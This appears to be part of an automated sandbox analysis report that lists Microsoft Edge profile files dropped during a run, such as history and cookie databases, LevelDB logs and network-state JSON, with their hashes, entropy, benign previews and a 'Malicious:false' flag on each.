                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):429
                                                                                                                                                                                                                                                                  Entropy (8bit):5.809210454117189
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                                                                                                                  MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                                                                                                                  SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                                                                                                                  SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                                                                                                                  SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):155648
                                                                                                                                                                                                                                                                  Entropy (8bit):0.6380916015484032
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:+8wqxqX+AaEWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE7m:+1qxqPEhH+bDo3iN0Z2TVJkXBBE3ybd
                                                                                                                                                                                                                                                                  MD5:278D9A11154FAF4D493D0C0355052C63
                                                                                                                                                                                                                                                                  SHA1:88BC1A8A38FCBCC812F4C157A3BF023CC104C58C
                                                                                                                                                                                                                                                                  SHA-256:4238E330558802D8332023AB8590865ECEBD4E2BFF3DD9B93D584A7D795984D8
                                                                                                                                                                                                                                                                  SHA-512:2E949BF071FCD9D8A093AC88D9BE1913C22708B501BBBF2407E43847D430B1CBA1AC0473646AA5CAC087197C832E288F8A1A8F5A92DD31C7E37A372C5B93CA73
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):8720
                                                                                                                                                                                                                                                                  Entropy (8bit):0.2191763562065486
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:DqlljtFlljq7A/mhWJFuQ3yy7IOWUCt4dweytllrE9SFcTp4AGbNCV9RUIRn:2/I75fOw4d0Xi99pEYb
                                                                                                                                                                                                                                                                  MD5:36F27418D26A9897CB6FB45683D7D1DF
                                                                                                                                                                                                                                                                  SHA1:7D03695ED963956794ABB907C8CF582D67F1CF04
                                                                                                                                                                                                                                                                  SHA-256:1DD0B6FE423B0175D421006C28AD894D996CC0FD447093DDEFD96CADD591AD5F
                                                                                                                                                                                                                                                                  SHA-512:D85C9CFFD87155611B4453DA3F693B2DCE5D2D997E3A3765997AD99CCD36A303250B5C9A4B5BB2755C208F6319DE7C8138857290CD619BB456DC0DDD11BF80A2
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:.............f....&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                                                                                  Entropy (8bit):3.648070432605871
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:aj9P0mcAjlUP/KbtZ773pL7QkQerWhCgam6ItRKToaAu:adcKlUP/w79e2Wv9RKcC
                                                                                                                                                                                                                                                                  MD5:BB6747D393CEEE570AD8D621011CB11B
                                                                                                                                                                                                                                                                  SHA1:AA0FC61E25825CAB567CC222172279C1AD035EAB
                                                                                                                                                                                                                                                                  SHA-256:00C67374DB7E613E1DDF924AC6C871FBBA009B455F3E79C77DB19711A9C9B928
                                                                                                                                                                                                                                                                  SHA-512:B572541FB32EF544C926ECF218FFC3FFE60072FF97E6D30327414A786093E411FA58949965EE882D779197A72347700773ED0B77A333CDE23E6D92078D60C1A9
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):412
                                                                                                                                                                                                                                                                  Entropy (8bit):5.242255148580128
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:7LM+vVaYeb8rcHEZrELFUt8O3/+OKMV5OaYeb8rcHEZrEZSJ:7RVaYeb8nZrExg8OL3OaYeb8nZrEZe
                                                                                                                                                                                                                                                                  MD5:C18442147FF7FDB94653CC4368B2D479
                                                                                                                                                                                                                                                                  SHA1:3C697841F1D89E93633707A8080BE63433AFB9FB
                                                                                                                                                                                                                                                                  SHA-256:84B8BF344E8CA2D1DC60200EE80AE6D2C72BF9A04109C5D9D192619F65A6B75E
                                                                                                                                                                                                                                                                  SHA-512:FA5645B2CBD0061D39EF294F16899EFC0B9C7051D7C7F607FEEFE1027ED7A7BA4B13417295D5EC2DBD2087D029A56D72AE1195B3BDEAC4507D965DB717E5F432
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:27.370 1cfc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/19-07:44:27.371 1cfc Recovering log #3.2024/12/19-07:44:27.371 1cfc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):412
                                                                                                                                                                                                                                                                  Entropy (8bit):5.242255148580128
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:7LM+vVaYeb8rcHEZrELFUt8O3/+OKMV5OaYeb8rcHEZrEZSJ:7RVaYeb8nZrExg8OL3OaYeb8nZrEZe
                                                                                                                                                                                                                                                                  MD5:C18442147FF7FDB94653CC4368B2D479
                                                                                                                                                                                                                                                                  SHA1:3C697841F1D89E93633707A8080BE63433AFB9FB
                                                                                                                                                                                                                                                                  SHA-256:84B8BF344E8CA2D1DC60200EE80AE6D2C72BF9A04109C5D9D192619F65A6B75E
                                                                                                                                                                                                                                                                  SHA-512:FA5645B2CBD0061D39EF294F16899EFC0B9C7051D7C7F607FEEFE1027ED7A7BA4B13417295D5EC2DBD2087D029A56D72AE1195B3BDEAC4507D965DB717E5F432
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:27.370 1cfc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/12/19-07:44:27.371 1cfc Recovering log #3.2024/12/19-07:44:27.371 1cfc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                                                                                                  Entropy (8bit):5.128926261752939
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPPM+q2PN723oH+Tcwt8a2jMGIFUt8OoPJEXZmw+OoP6dpMVkwON723oH+Tcwtw:76M+vVaYeb8EFUt8OJX/+OPpMV5OaYek
                                                                                                                                                                                                                                                                  MD5:FDDA4048AB323B09F3475BB5FC8331CC
                                                                                                                                                                                                                                                                  SHA1:9E69B3B6262C952A636BFA89CD6AD1094C53A16B
                                                                                                                                                                                                                                                                  SHA-256:98C25E22FBCE07A5A415B2C2EB4BD22D3967DCCA9FFD2B6D25167222D3B99002
                                                                                                                                                                                                                                                                  SHA-512:1B0B89E5D72EBCF7CCD3E3BD074D6B88D52B7CF87925E57416BAA028AD2422113113B13FF3879558DC8F1B95B49DB767878A65C858FAFECCD9C988D01F1D01E9
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:24.097 1e8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/19-07:44:24.099 1e8c Recovering log #3.2024/12/19-07:44:24.102 1e8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                                                                                                  Entropy (8bit):5.128926261752939
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:6:7oPPM+q2PN723oH+Tcwt8a2jMGIFUt8OoPJEXZmw+OoP6dpMVkwON723oH+Tcwtw:76M+vVaYeb8EFUt8OJX/+OPpMV5OaYek
                                                                                                                                                                                                                                                                  MD5:FDDA4048AB323B09F3475BB5FC8331CC
                                                                                                                                                                                                                                                                  SHA1:9E69B3B6262C952A636BFA89CD6AD1094C53A16B
                                                                                                                                                                                                                                                                  SHA-256:98C25E22FBCE07A5A415B2C2EB4BD22D3967DCCA9FFD2B6D25167222D3B99002
                                                                                                                                                                                                                                                                  SHA-512:1B0B89E5D72EBCF7CCD3E3BD074D6B88D52B7CF87925E57416BAA028AD2422113113B13FF3879558DC8F1B95B49DB767878A65C858FAFECCD9C988D01F1D01E9
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:2024/12/19-07:44:24.097 1e8c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/19-07:44:24.099 1e8c Recovering log #3.2024/12/19-07:44:24.102 1e8c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\1e992c2d-4901-4fd3-9bea-c20dfe614901.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\60dcd221-2e80-4e9e-9cf8-a1be90e0ff73.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\936a0df5-e584-4186-aee9-37313cc7bd7d.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1808
                                                                                                                                                                                                                                                                  Entropy (8bit):5.315745035184208
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:YcCpfC0gCzs5tsFfcKsaCiRsFleeIkhYhbm:F2fhSKJVGkeIkOhK
                                                                                                                                                                                                                                                                  MD5:21FA852E1E1A9626C939512F0316AA5F
                                                                                                                                                                                                                                                                  SHA1:F3B1F20C845760064A8C010B299A02A397CD4A79
                                                                                                                                                                                                                                                                  SHA-256:FAB03813BE3DBFA72D57EE1EA77DED8E6B3D01D728BEEF8138FF6C8C7DD218A5
                                                                                                                                                                                                                                                                  SHA-512:56CD811475112149F4039C09233054D489E6945CEBDBC4753F4D201FCCFE21A0B2499370EF173B35AC71F677EE2ABB6DA9C5177E731744AE84197C87BE7AD587
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381677867426390","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381677870195441","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"1

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\993952e2-8ad8-4fa1-be20-1b3c61cf57ca.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\9a629a33-76fe-4248-9fa5-70e9c3dc9d99.tmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                  Entropy (8bit):1.1364357768377047
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:TsKLopF+SawLUO1Xj8BWiDS35DVkyerFN5VGL:te+AuBDSSs
                                                                                                                                                                                                                                                                  MD5:DFBB24F159F4BD8F1088AD49136A04C0
                                                                                                                                                                                                                                                                  SHA1:B1AD3F1E00920C64D3F51F8A812328309A4C28F4
                                                                                                                                                                                                                                                                  SHA-256:D0C7D5CC2E53F936594F2B7D58D909F4789ECDDD85340B207D4AC2631C76D978
                                                                                                                                                                                                                                                                  SHA-512:44C2933BC61C6535C20698B21B471C4E46B188943E3F8BEEA95817C9723C0E12F3B011376F58CBC0042EEF8FE766F74C7F970AF73CBD5CB3C06F6E3600DED041
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1452
                                                                                                                                                                                                                                                                  Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                  MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                  SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                  SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                  SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282221456","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552282945526","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343552291816684","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server"

                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF4b1d7.TMP (copy)

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):1452
                                                                                                                                                                                                                                                                  Entropy (8bit):5.287213485277577
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:YcCp/WRdstyZVMdmRdsHKyZFRudFGRwC5mWRdspZFGJ/I3w6C1E6maPsQYhbA7n7:YcCpWsktsHnfc7CvsfgCgakhYhbm
                                                                                                                                                                                                                                                                  MD5:093E3F0EA7D5CE1697260321E93C95EB
                                                                                                                                                                                                                                                                  SHA1:6D262FF62829A9F3990AFC80B9F457A1F345290C
                                                                                                                                                                                                                                                                  SHA-256:76CC4ABA0355B54B8694788A7DAD9C08FA1F6413DFCEE7A666D95A69C7A16A60
                                                                                                                                                                                                                                                                  SHA-512:2419B824319070C466335A90D9FAB94B9734245C1A58F4E3452BC7952D29FC346A04ECA62F549047EC26189C0386A07E7120466A7A78474CDF19280457804F4F
                                                                                                                                                                                                                                                                  Malicious:false
